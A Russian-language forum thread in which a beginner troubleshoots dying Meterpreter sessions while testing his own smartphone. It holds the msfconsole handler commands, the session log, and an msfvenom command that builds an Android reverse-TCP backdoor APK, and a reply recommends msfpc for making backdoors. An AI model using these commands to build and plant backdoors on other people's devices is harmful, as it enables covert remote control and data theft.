• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Открытие и закрытие сесий Meterpreter

S

snaik

Доброго времени суток, я новичек в плане метасплоита но все же пытаюсь взломать свой смартфон, и так почитал гайды по написанию эксплоита. Все сделал правильно запустил msfconsole далее последовали такие команды из мануал предоставленого на форуме
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.0.6
set LPORT 4444
exploit
Дальше захожу на телефон устанавливаю эксплоит запускаю и вижу вот таку вот картину

[*] Sending stage (72699 bytes) to 10.10.0.3
[*] 10.10.0.3 - Meterpreter session 5 closed. Reason: Died
[*] Meterpreter session 6 opened (10.10.0.6:4444 -> 10.10.0.3:33682) at 2019-09-19 02:31:46 +0300
[*] Sending stage (72699 bytes) to 10.10.0.3
[*] 10.10.0.3 - Meterpreter session 6 closed. Reason: Died
[*] Meterpreter session 7 opened (10.10.0.6:4444 -> 10.10.0.3:33684) at 2019-09-19 02:31:56 +0300
[*] 10.10.0.3 - Meterpreter session 7 closed. Reason: Died
[*] Sending stage (72699 bytes) to 10.10.0.3
[*] Meterpreter session 8 opened (10.10.0.6:4444 -> 10.10.0.3:33686) at 2019-09-19 02:32:02 +0300
[*] 10.10.0.3 - Meterpreter session 8 closed. Reason: Died

вывод с терминала

Не где не могу нагуглить почему он открывает сесию и потом ее закрывает?
 
Нет, проблему я нашел, и проблема не в сети, проблема в полезной нагрузке как я понял чуть позже выложу решение
Хорошо. Как помню у меня бывали такие случаи, только это было связано с windows и смена payload решила эту проблему
 
И так добрался до компа так вот в чем заключалась моя проблема это моя невнимательность.

в одном гайде изначально создавал apk файл таким образом
msfvenom -p android/meterpreter_reverse_tcp LHOST=10.10.0.6 LPORT=4444 R > avanger.apk

но как запускать полезную нагрузку я посмотрел другой гайд и там было
set payload android/meterpreter/reverse_tcp

и вот в чем разница, изначально не особо заметно но в msfconsole есть 2 пути к этому эксплоиту.
Так что можно считать тема закрыта проблема решена...
 
И так добрался до компа так вот в чем заключалась моя проблема это моя невнимательность.

в одном гайде изначально создавал apk файл таким образом
msfvenom -p android/meterpreter_reverse_tcp LHOST=10.10.0.6 LPORT=4444 R > avanger.apk

но как запускать полезную нагрузку я посмотрел другой гайд и там было
set payload android/meterpreter/reverse_tcp

и вот в чем разница, изначально не особо заметно но в msfconsole есть 2 пути к этому эксплоиту.
Так что можно считать тема закрыта проблема решена...
Ну это хорошо, бывает. Кстати, можешь познакомится с командой msfpc, тоже создает бэкдоры и он весьма прост в использований. Так что, советую познакомится с ним).
 
Ну это хорошо, бывает. Кстати, можешь познакомится с командой msfpc, тоже создает бэкдоры и он весьма прост в использований. Так что, советую познакомится с ним).
Спасибо большое, обязательно познакомлюсь, только начал путь пентестера)
 
Спасибо большое, обязательно познакомлюсь, только начал путь пентестера)
Похвально, путь будет интересным). Тебе случаем курс по metasploit не нужен? курс хоть и 2015 года, но познакомит с metasploit хорошо, сам после курса узнал много нового про него).
 
Похвально, путь будет интересным). Тебе случаем курс по metasploit не нужен? курс хоть и 2015 года, но познакомит с metasploit хорошо, сам после курса узнал много нового про него).
Конечно было бы заемчательно, это бы ускорило мое изучение)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!